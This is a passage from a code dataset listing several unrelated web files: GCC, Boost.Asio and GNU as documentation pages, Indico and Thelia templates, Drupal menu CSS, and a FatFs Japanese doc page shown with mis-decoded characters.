path
stringlengths 5
312
| repo_name
stringlengths 5
116
| content
stringlengths 2
1.04M
|
|---|---|---|
lib/generators/templates/widgets/new.html
|
stewartmckee/dashing-rails
|
<!-- Your new widget html -->
|
toolchain/osx/gcc-arm-none-eabi-6-2017-q1-update/share/doc/gcc-arm-none-eabi/html/libm/fmax.html
|
ChangsoonKim/STM32F7DiscTutor
|
<html lang="en">
<head>
<title>fmax - Untitled</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Untitled">
<meta name="generator" content="makeinfo 4.8">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Math.html#Math" title="Math">
<link rel="prev" href="fma.html#fma" title="fma">
<link rel="next" href="fmin.html#fmin" title="fmin">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
</head>
<body>
<div class="node">
<p>
<a name="fmax"></a>
Next: <a rel="next" accesskey="n" href="fmin.html#fmin">fmin</a>,
Previous: <a rel="previous" accesskey="p" href="fma.html#fma">fma</a>,
Up: <a rel="up" accesskey="u" href="Math.html#Math">Math</a>
<hr>
</div>
<h3 class="section">1.23 <code>fmax</code>, <code>fmaxf</code>—maximum</h3>
<p><a name="index-fmax-57"></a><a name="index-fmaxf-58"></a><strong>Synopsis</strong>
<pre class="example"> #include <math.h>
double fmax(double <var>x</var>, double <var>y</var>);
float fmaxf(float <var>x</var>, float <var>y</var>);
</pre>
<p><strong>Description</strong><br>
The <code>fmax</code> functions determine the maximum numeric value of their arguments.
NaN arguments are treated as missing data: if one argument is a NaN and the
other numeric, then the <code>fmax</code> functions choose the numeric value.
<pre class="sp">
</pre>
<strong>Returns</strong><br>
The <code>fmax</code> functions return the maximum numeric value of their arguments.
<pre class="sp">
</pre>
<strong>Portability</strong><br>
ANSI C, POSIX.
<pre class="sp">
</pre>
</body></html>
|
indico/modules/events/templates/display/indico/_details.html
|
indico/indico
|
{% from 'events/timetable/display/indico/_common.html' import render_speakers, render_references,
render_description %}
{% from 'attachments/_display.html' import render_attachments_folders %}
{# Do not forget to update the conditions in the parent template when you add a new row in the details table. #}
<div class="event-details">
{% if event.description %}
<div class="event-details-row">
<div class="event-details-label">{% trans %}Description{% endtrans %}</div>
<div class="event-details-content">{{ render_description(event, class='event-description') }}</div>
</div>
{% endif %}
{% if event.references and event.type_.name == "meeting" %}
<div class="event-details-row">
<div class="event-details-label">{% trans %}External references{% endtrans %}</div>
<div class="event-details-content">{{ render_references(event) }}</div>
</div>
{% endif %}
{% if files or folders %}
<div class="event-details-row">
<div class="event-details-label icon-attachment inline-attachments-icon"></div>
<div class="event-details-content material-list">
{{ render_attachments_folders(files=files, folders=folders) }}
</div>
</div>
{% endif %}
{% if lectures %}
<div class="event-details-row">
<div class="event-details-label">{% trans %}From the same series{% endtrans %}</div>
<div class="event-details-content">
{% for lecture in lectures %}
<a href="{{ lecture.url }}" class="lecture-series-link">{{ lecture.series_pos }}</a>
{% endfor %}
</div>
</div>
{% endif %}
{% if event.organizer_info %}
<div class="event-details-row">
<div class="event-details-label">{% trans %}Organized by{% endtrans %}</div>
<div class="event-details-content">{{ event.organizer_info | markdown }}</div>
</div>
{% endif %}
{{ hook_event_header }}
{% if event.contact_emails or event.contact_phones %}
<div class="event-details-row">
<div class="event-details-label">{{ event.contact_title }}</div>
<div class="event-details-content">
{% for email in event.contact_emails %}
<div>
<i class="icon-mail"></i>
<a href="mailto:{{ email }}">{{ email }}</a>
</div>
{% endfor %}
{% for phone in event.contact_phones %}
<div>
<i class="icon-phone"></i>
<a href="tel:{{ phone }}">{{ phone }}</a>
</div>
{% endfor %}
</div>
</div>
{% endif %}
</div>
|
src/deps/boost/doc/html/boost_asio/reference/buffered_stream.html
|
mxrrow/zaicoin
|
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>buffered_stream</title>
<link rel="stylesheet" href="../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../boost_asio.html" title="Boost.Asio">
<link rel="up" href="../reference.html" title="Reference">
<link rel="prev" href="buffered_read_stream/write_some/overload2.html" title="buffered_read_stream::write_some (2 of 2 overloads)">
<link rel="next" href="buffered_stream/async_fill.html" title="buffered_stream::async_fill">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../boost.png"></td>
<td align="center"><a href="../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="buffered_read_stream/write_some/overload2.html"><img src="../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../reference.html"><img src="../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../boost_asio.html"><img src="../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="buffered_stream/async_fill.html"><img src="../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h3 class="title">
<a name="boost_asio.reference.buffered_stream"></a><a class="link" href="buffered_stream.html" title="buffered_stream">buffered_stream</a>
</h3></div></div></div>
<p>
Adds buffering to the read- and write-related operations of a stream.
</p>
<pre class="programlisting"><span class="keyword">template</span><span class="special"><</span>
<span class="keyword">typename</span> <span class="identifier">Stream</span><span class="special">></span>
<span class="keyword">class</span> <span class="identifier">buffered_stream</span> <span class="special">:</span>
<span class="identifier">noncopyable</span>
</pre>
<h5>
<a name="boost_asio.reference.buffered_stream.h0"></a>
<span><a name="boost_asio.reference.buffered_stream.types"></a></span><a class="link" href="buffered_stream.html#boost_asio.reference.buffered_stream.types">Types</a>
</h5>
<div class="informaltable"><table class="table">
<colgroup>
<col>
<col>
</colgroup>
<thead><tr>
<th>
<p>
Name
</p>
</th>
<th>
<p>
Description
</p>
</th>
</tr></thead>
<tbody>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/lowest_layer_type.html" title="buffered_stream::lowest_layer_type"><span class="bold"><strong>lowest_layer_type</strong></span></a>
</p>
</td>
<td>
<p>
The type of the lowest layer.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/next_layer_type.html" title="buffered_stream::next_layer_type"><span class="bold"><strong>next_layer_type</strong></span></a>
</p>
</td>
<td>
<p>
The type of the next layer.
</p>
</td>
</tr>
</tbody>
</table></div>
<h5>
<a name="boost_asio.reference.buffered_stream.h1"></a>
<span><a name="boost_asio.reference.buffered_stream.member_functions"></a></span><a class="link" href="buffered_stream.html#boost_asio.reference.buffered_stream.member_functions">Member Functions</a>
</h5>
<div class="informaltable"><table class="table">
<colgroup>
<col>
<col>
</colgroup>
<thead><tr>
<th>
<p>
Name
</p>
</th>
<th>
<p>
Description
</p>
</th>
</tr></thead>
<tbody>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/async_fill.html" title="buffered_stream::async_fill"><span class="bold"><strong>async_fill</strong></span></a>
</p>
</td>
<td>
<p>
Start an asynchronous fill.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/async_flush.html" title="buffered_stream::async_flush"><span class="bold"><strong>async_flush</strong></span></a>
</p>
</td>
<td>
<p>
Start an asynchronous flush.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/async_read_some.html" title="buffered_stream::async_read_some"><span class="bold"><strong>async_read_some</strong></span></a>
</p>
</td>
<td>
<p>
Start an asynchronous read. The buffer into which the data will
be read must be valid for the lifetime of the asynchronous operation.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/async_write_some.html" title="buffered_stream::async_write_some"><span class="bold"><strong>async_write_some</strong></span></a>
</p>
</td>
<td>
<p>
Start an asynchronous write. The data being written must be valid
for the lifetime of the asynchronous operation.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/buffered_stream.html" title="buffered_stream::buffered_stream"><span class="bold"><strong>buffered_stream</strong></span></a>
</p>
</td>
<td>
<p>
Construct, passing the specified argument to initialise the next
layer.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/close.html" title="buffered_stream::close"><span class="bold"><strong>close</strong></span></a>
</p>
</td>
<td>
<p>
Close the stream.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/fill.html" title="buffered_stream::fill"><span class="bold"><strong>fill</strong></span></a>
</p>
</td>
<td>
<p>
Fill the buffer with some data. Returns the number of bytes placed
in the buffer as a result of the operation. Throws an exception
on failure.
</p>
<p>
Fill the buffer with some data. Returns the number of bytes placed
in the buffer as a result of the operation, or 0 if an error occurred.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/flush.html" title="buffered_stream::flush"><span class="bold"><strong>flush</strong></span></a>
</p>
</td>
<td>
<p>
Flush all data from the buffer to the next layer. Returns the number
of bytes written to the next layer on the last write operation.
Throws an exception on failure.
</p>
<p>
Flush all data from the buffer to the next layer. Returns the number
of bytes written to the next layer on the last write operation,
or 0 if an error occurred.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/get_io_service.html" title="buffered_stream::get_io_service"><span class="bold"><strong>get_io_service</strong></span></a>
</p>
</td>
<td>
<p>
Get the io_service associated with the object.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/in_avail.html" title="buffered_stream::in_avail"><span class="bold"><strong>in_avail</strong></span></a>
</p>
</td>
<td>
<p>
Determine the amount of data that may be read without blocking.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/lowest_layer.html" title="buffered_stream::lowest_layer"><span class="bold"><strong>lowest_layer</strong></span></a>
</p>
</td>
<td>
<p>
Get a reference to the lowest layer.
</p>
<p>
Get a const reference to the lowest layer.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/next_layer.html" title="buffered_stream::next_layer"><span class="bold"><strong>next_layer</strong></span></a>
</p>
</td>
<td>
<p>
Get a reference to the next layer.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/peek.html" title="buffered_stream::peek"><span class="bold"><strong>peek</strong></span></a>
</p>
</td>
<td>
<p>
Peek at the incoming data on the stream. Returns the number of
bytes read. Throws an exception on failure.
</p>
<p>
Peek at the incoming data on the stream. Returns the number of
bytes read, or 0 if an error occurred.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/read_some.html" title="buffered_stream::read_some"><span class="bold"><strong>read_some</strong></span></a>
</p>
</td>
<td>
<p>
Read some data from the stream. Returns the number of bytes read.
Throws an exception on failure.
</p>
<p>
Read some data from the stream. Returns the number of bytes read
or 0 if an error occurred.
</p>
</td>
</tr>
<tr>
<td>
<p>
<a class="link" href="buffered_stream/write_some.html" title="buffered_stream::write_some"><span class="bold"><strong>write_some</strong></span></a>
</p>
</td>
<td>
<p>
Write the given data to the stream. Returns the number of bytes
written. Throws an exception on failure.
</p>
<p>
Write the given data to the stream. Returns the number of bytes
written, or 0 if an error occurred.
</p>
</td>
</tr>
</tbody>
</table></div>
<p>
The <a class="link" href="buffered_stream.html" title="buffered_stream"><code class="computeroutput"><span class="identifier">buffered_stream</span></code></a>
class template can be used to add buffering to the synchronous and asynchronous
read and write operations of a stream.
</p>
<h5>
<a name="boost_asio.reference.buffered_stream.h2"></a>
<span><a name="boost_asio.reference.buffered_stream.thread_safety"></a></span><a class="link" href="buffered_stream.html#boost_asio.reference.buffered_stream.thread_safety">Thread
Safety</a>
</h5>
<p>
<span class="bold"><strong>Distinct</strong></span> <span class="bold"><strong>objects:</strong></span>
Safe.
</p>
<p>
<span class="bold"><strong>Shared</strong></span> <span class="bold"><strong>objects:</strong></span>
Unsafe.
</p>
<h5>
<a name="boost_asio.reference.buffered_stream.h3"></a>
<span><a name="boost_asio.reference.buffered_stream.requirements"></a></span><a class="link" href="buffered_stream.html#boost_asio.reference.buffered_stream.requirements">Requirements</a>
</h5>
<p>
<span class="bold"><strong>Header: </strong></span><code class="literal">boost/asio/buffered_stream.hpp</code>
</p>
<p>
<span class="bold"><strong>Convenience header: </strong></span><code class="literal">boost/asio.hpp</code>
</p>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2003-2012 Christopher M. Kohlhoff<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="buffered_read_stream/write_some/overload2.html"><img src="../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../reference.html"><img src="../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../boost_asio.html"><img src="../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="buffered_stream/async_fill.html"><img src="../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
src/deps/boost/doc/html/boost_asio/reference/basic_deadline_timer/basic_deadline_timer/overload3.html
|
mxrrow/zaicoin
|
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>basic_deadline_timer::basic_deadline_timer (3 of 3 overloads)</title>
<link rel="stylesheet" href="../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../../../boost_asio.html" title="Boost.Asio">
<link rel="up" href="../basic_deadline_timer.html" title="basic_deadline_timer::basic_deadline_timer">
<link rel="prev" href="overload2.html" title="basic_deadline_timer::basic_deadline_timer (2 of 3 overloads)">
<link rel="next" href="../cancel.html" title="basic_deadline_timer::cancel">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../boost.png"></td>
<td align="center"><a href="../../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="overload2.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../basic_deadline_timer.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../boost_asio.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="../cancel.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h5 class="title">
<a name="boost_asio.reference.basic_deadline_timer.basic_deadline_timer.overload3"></a><a class="link" href="overload3.html" title="basic_deadline_timer::basic_deadline_timer (3 of 3 overloads)">basic_deadline_timer::basic_deadline_timer
(3 of 3 overloads)</a>
</h5></div></div></div>
<p>
Constructor to set a particular expiry time relative to now.
</p>
<pre class="programlisting"><span class="identifier">basic_deadline_timer</span><span class="special">(</span>
<span class="identifier">boost</span><span class="special">::</span><span class="identifier">asio</span><span class="special">::</span><span class="identifier">io_service</span> <span class="special">&</span> <span class="identifier">io_service</span><span class="special">,</span>
<span class="keyword">const</span> <span class="identifier">duration_type</span> <span class="special">&</span> <span class="identifier">expiry_time</span><span class="special">);</span>
</pre>
<p>
This constructor creates a timer and sets the expiry time.
</p>
<h6>
<a name="boost_asio.reference.basic_deadline_timer.basic_deadline_timer.overload3.h0"></a>
<span><a name="boost_asio.reference.basic_deadline_timer.basic_deadline_timer.overload3.parameters"></a></span><a class="link" href="overload3.html#boost_asio.reference.basic_deadline_timer.basic_deadline_timer.overload3.parameters">Parameters</a>
</h6>
<div class="variablelist">
<p class="title"><b></b></p>
<dl>
<dt><span class="term">io_service</span></dt>
<dd><p>
The <a class="link" href="../../io_service.html" title="io_service"><code class="computeroutput"><span class="identifier">io_service</span></code></a> object that
the timer will use to dispatch handlers for any asynchronous operations
performed on the timer.
</p></dd>
<dt><span class="term">expiry_time</span></dt>
<dd><p>
The expiry time to be used for the timer, relative to now.
</p></dd>
</dl>
</div>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2003-2012 Christopher M. Kohlhoff<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="overload2.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../basic_deadline_timer.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../boost_asio.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="../cancel.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
sites/all/modules/responsive_menu/css/responsive_menu_desktop.css
|
kbulloch/blog_drupals
|
label#toggle-icon {
display: none; }
.l-responsive-page-container, #menu, #menu .sub-nav {
-webkit-transform: translate(0, 0) !important;
-ms-transform: translate(0, 0) !important;
transform: translate(0, 0) !important; }
#menu label,
#menu .sub-nav,
#menu .sub-heading,
#header label {
display: none; }
#menu {
left: auto;
height: 0;
width: 100%;
z-index: 1; }
#menu > ul {
position: relative;
margin-top: 0;
display: inline-table; }
#menu ul:after {
content: "";
clear: both;
display: block; }
#menu ul li {
float: left;
position: relative; }
#menu ul li a:only-child:after {
content: ""; }
#menu ul li a:after {
content: "\25BA";
position: absolute;
right: 0.5em;
margin-top: -1.5625em;
display: block;
font: 1.5em Arial; }
#menu ul li:hover > ul {
display: block; }
#menu ul ul {
position: absolute;
left: 0; }
#menu ul ul li {
float: none;
width: 13.75em; }
#menu ul ul li a {
padding: 0 1.5em; }
#menu ul ul li a:after {
right: 0.375em;
margin-top: -1.6875em;
-webkit-transform: none;
-ms-transform: none;
transform: none; }
#menu ul ul .sub-nav {
float: left;
top: 0;
left: 13.75em;
margin-left: 0; }
#menu ul .sub-nav {
top: auto;
bottom: auto;
left: auto;
width: auto;
margin-top: 0; }
#menu ul .fly-left ul {
left: -13.75em; }
#menu {
background-color: #222;
height: 3.15em; }
#menu > ul {
font-size: 0.875em;
border: 0; }
#menu > ul > li {
border: 0; }
#menu ul {
border-top: 0; }
#menu ul:after {
content: "";
clear: both;
display: block; }
#menu ul li {
float: left;
position: relative;
text-align: left; }
#menu ul li a {
padding: 0.5em 2.5em 0.5em 1.5em; }
#menu ul li a:only-child {
padding-right: 1.5em; }
#menu ul li a:only-child:after {
content: ""; }
#menu ul li a:after {
content: "\203A";
position: absolute;
right: 0.5em;
margin-top: -1.5625em;
display: block;
font: 1.5em Arial;
-webkit-transform: rotate(90deg);
-ms-transform: rotate(90deg);
transform: rotate(90deg); }
#menu ul li:hover > a {
background-color: #333;
-webkit-transition: background-color .25s ease;
transition: background-color 0.25s ease; }
#menu ul ul li {
width: 13.75em;
border-left: 0; }
#menu ul ul li a {
padding: 0 1.5em; }
#menu ul ul li a:after {
right: 0.375em;
margin-top: -1.6875em;
-webkit-transform: none;
-ms-transform: none;
transform: none; }
#menu ul .fly-left a:after {
right: auto;
left: 0.5em;
left: 0.375em;
margin-top: -1.5625em;
-webkit-transform: rotate(-180deg);
-ms-transform: rotate(-180deg);
transform: rotate(-180deg); }
|
libraries/UHS_FS/FAT/FatFS/doc/ja/getlabel.html
|
felis/UHS30
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="ja">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<meta http-equiv="Content-Style-Type" content="text/css">
<link rel="up" title="FatFs" href="../00index_j.html">
<link rel="alternate" hreflang="en" title="English" href="../en/getlabel.html">
<link rel="stylesheet" href="../css_j.css" type="text/css" media="screen" title="ELM Default">
<title>FatFs - f_getlabel</title>
</head>
<body>
<div class="para func">
<h2>f_getlabel</h2>
<p>{
[Exðæ¾µÜ·B</p>
<pre>
FRESULT f_getlabel (
const TCHAR* <span class="arg">path</span>, <span class="c">/* [IN] ÎÛhCu */</span>
TCHAR* <span class="arg">name</span>, <span class="c">/* [OUT] {
[¼ði[·éobt@ */</span>
DWORD* <span class="arg">sn</span> <span class="c">/* [OUT] {
[EVAÔði[·éÏ */</span>
);
</pre>
</div>
<div class="para arg">
<h4>ø</h4>
<dl class="par">
<dt>path</dt>
<dd>ÎÛÆÈé_hCuÌ<a href="filename.html">pX¼</a>ð¦·k¶<tt>'\0'</tt>I[̶ñÖÌ|C^ðwèµÜ·Bk¶ñÌêÍAftHgEhCuðwèµ½±ÆÉÈèÜ·B</dd>
<dt>name</dt>
<dd>{
[¼ði[·ézñÖÌ|C^ðwèµÜ·BÈÆà12vfÌTCYªKvÅ·B{
[¼ªÈ¢êÍk¶ñªÔ³êÜ·B±ÌîñªsvÈÆ«ÍkE|C^ðwèµÄ¾³¢B</dd>
<dt>sn</dt>
<dd>{
[EVAÔði[·é<tt>DWORD</tt>ÏÖÌ|C^ðwèµÜ·B±ÌîñªsvÈÆ«ÍkE|C^ðwèµÄ¾³¢B</dd>
</dl>
</div>
<div class="para ret">
<h4>ßèl</h4>
<p>
<a href="rc.html#ok">FR_OK</a>,
<a href="rc.html#de">FR_DISK_ERR</a>,
<a href="rc.html#ie">FR_INT_ERR</a>,
<a href="rc.html#nr">FR_NOT_READY</a>,
<a href="rc.html#id">FR_INVALID_DRIVE</a>,
<a href="rc.html#ne">FR_NOT_ENABLED</a>,
<a href="rc.html#ns">FR_NO_FILESYSTEM</a>,
<a href="rc.html#tm">FR_TIMEOUT</a>
</p>
</div>
<div class="para comp">
<h4>Îîñ</h4>
<p><tt>_USE_LABEL == 1</tt>ÌÆ«ÉgpÂ\Å·B</p>
</div>
<div class="para use">
<h4>gpá</h4>
<pre>
char str[12];
<span class="c">/* ftHgEhCuÌ{
[¼ð¾é */</span>
f_getlabel("", str, 0);
<span class="c">/* hCu2Ì{
[¼ð¾é */</span>
f_getlabel("2:", str, 0);
</pre>
</div>
<div class="para ref">
<h4>QÆ</h4>
<tt><a href="setlabel.html">f_setlabel</a></tt>
</div>
<p class="foot"><a href="../00index_j.html">ßé</a></p>
</body>
</html>
|
rktools/toolchain/linaro/share/doc/gcc-linaro-arm-linux-gnueabihf/html/as.html/Xtensa-Relaxation.html
|
trlsmax/rk3188_kernel_tinyastro
|
<html lang="en">
<head>
<title>Xtensa Relaxation - Using as</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Using as">
<meta name="generator" content="makeinfo 4.13">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Xtensa_002dDependent.html#Xtensa_002dDependent" title="Xtensa-Dependent">
<link rel="prev" href="Xtensa-Optimizations.html#Xtensa-Optimizations" title="Xtensa Optimizations">
<link rel="next" href="Xtensa-Directives.html#Xtensa-Directives" title="Xtensa Directives">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
This file documents the GNU Assembler "as".
Copyright (C) 1991, 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999,
2000, 2001, 2002, 2006, 2007, 2008, 2009, 2010, 2011 Free Software Foundation,
Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3
or any later version published by the Free Software Foundation;
with no Invariant Sections, with no Front-Cover Texts, and with no
Back-Cover Texts. A copy of the license is included in the
section entitled ``GNU Free Documentation License''.
-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
</head>
<body>
<div class="node">
<a name="Xtensa-Relaxation"></a>
<p>
Next: <a rel="next" accesskey="n" href="Xtensa-Directives.html#Xtensa-Directives">Xtensa Directives</a>,
Previous: <a rel="previous" accesskey="p" href="Xtensa-Optimizations.html#Xtensa-Optimizations">Xtensa Optimizations</a>,
Up: <a rel="up" accesskey="u" href="Xtensa_002dDependent.html#Xtensa_002dDependent">Xtensa-Dependent</a>
<hr>
</div>
<h4 class="subsection">9.50.4 Xtensa Relaxation</h4>
<p><a name="index-relaxation-2299"></a>
When an instruction operand is outside the range allowed for that
particular instruction field, <samp><span class="command">as</span></samp> can transform the code
to use a functionally-equivalent instruction or sequence of
instructions. This process is known as <dfn>relaxation</dfn>. This is
typically done for branch instructions because the distance of the
branch targets is not known until assembly-time. The Xtensa assembler
offers branch relaxation and also extends this concept to function
calls, <code>MOVI</code> instructions and other instructions with immediate
fields.
<ul class="menu">
<li><a accesskey="1" href="Xtensa-Branch-Relaxation.html#Xtensa-Branch-Relaxation">Xtensa Branch Relaxation</a>: Relaxation of Branches.
<li><a accesskey="2" href="Xtensa-Call-Relaxation.html#Xtensa-Call-Relaxation">Xtensa Call Relaxation</a>: Relaxation of Function Calls.
<li><a accesskey="3" href="Xtensa-Immediate-Relaxation.html#Xtensa-Immediate-Relaxation">Xtensa Immediate Relaxation</a>: Relaxation of other Immediate Fields.
</ul>
</body></html>
|
Slate/slate-test.html
|
raxbg/slate
|
<html>
<head>
<script src='underscore.js'></script>
<script src='slate-mock.js'></script>
<script src='initialize.js'></script>
</head>
<body>
</body>
</html>
|
templates/frontOffice/randomlab/includes/toolbar.html
|
40thoughts/WEB-Random-Lab.io
|
<div class="toolbar toolbar-{$toolbar}" role="toolbar">
{if $toolbar == "top" }
<div class="sorter-container">
<span class="amount">{if ($amount > 1)}{intl l="%nb Items" nb="{$amount}"}{else}{intl l="%nb Item" nb="{$amount}"}{/if}</span>
<span class="limiter">
<label for="limit-top">{intl l="Show"}</label>
<select id="limit-top" name="limit">
<option value="{url path={navigate to="current"} limit="4"}" {if $limit==4}selected{/if}>4</option>
<option value="{url path={navigate to="current"} limit="8"}" {if $limit==8}selected{/if}>8</option>
<option value="{url path={navigate to="current"} limit="12"}" {if $limit==12}selected{/if}>12</option>
<option value="{url path={navigate to="current"} limit="50"}"{if $limit==50}selected{/if}>50</option>
<option value="{url path={navigate to="current"} limit="100000"}" {if $limit==100000}selected{/if}>{intl l="All"}</option>
</select>
<span class="per-page">{intl l="per page"}</span>
</span><!-- /.limiter -->
<span class="sort-by">
<label for="sortby-top">{intl l="Sort By"}</label>
<select id="sortby-top" name="sortby">
{*<option value="{url path="{category attr="url"}" order="manual"}">{intl l="Position"}</option>*}
<option value="{url path={navigate to="current"} limit=$limit order="alpha"}" {if $order=="alpha"}selected{/if}>{intl l="Name ascending"}</option>
<option value="{url path={navigate to="current"} limit=$limit order="alpha_reverse"}" {if $order=="alpha_reverse"}selected{/if}>{intl l="Name descending"}</option>
<option value="{url path={navigate to="current"} limit=$limit order="min_price"}" {if $order=="min_price"}selected{/if}>{intl l="Price ascending"}</option>
<option value="{url path={navigate to="current"} limit=$limit order="max_price"}" {if $order=="max_price"}selected{/if}>{intl l="Price descending"}</option>
{*<option value="{url path="{category attr="url"}" order="rating"}">{intl l="Rating"}</option>*}
</select>
</span><!-- /.sort-by -->
<span class="view-mode">
<span class="view-mode-label">{intl l="View as"}:</span>
<span class="view-mode-btn">
<a href="{url path="{navigate to="current"}" mode="grid"}" data-toggle="view" role="button" title="{intl l="Grid"}" rel="nofollow" class="btn btn-grid"><i class="icon-grid"></i></a>
<a href="{url path="{navigate to="current"}" mode="list"}" data-toggle="view" role="button" title="{intl l="List"}" rel="nofollow" class="btn btn-list"><i class="icon-list"></i></a>
</span>
</span><!-- /.view-mode -->
</div><!-- /.sorter -->
{else}
{if $amount > $limit}
<div class="pagination-container" role="pagination" aria-labelledby="pagination-label-{$toolbar}">
<strong id="pagination-label-{$toolbar}" class="pagination-label">{intl l="Pagination"}</strong>
<ul class="pagination">
{if $product_page le 1}
<li class="disabled">
<span class="prev"><i class="icon-prev"></i></span>
</li>
{else}
<li>
<a href="{url path={navigate to="current"} page={$product_page-1} }" title="{intl l="Previous"}" class="prev"><i class="icon-prev"></i></a>
</li>
{/if}
{pageloop rel="product_list"}
<li{if $PAGE eq $CURRENT} class="active"{/if}>
<a href="{url path={navigate to="current"} page=$PAGE }"> {$PAGE} </a>
</li>
{if $PAGE eq $LAST}
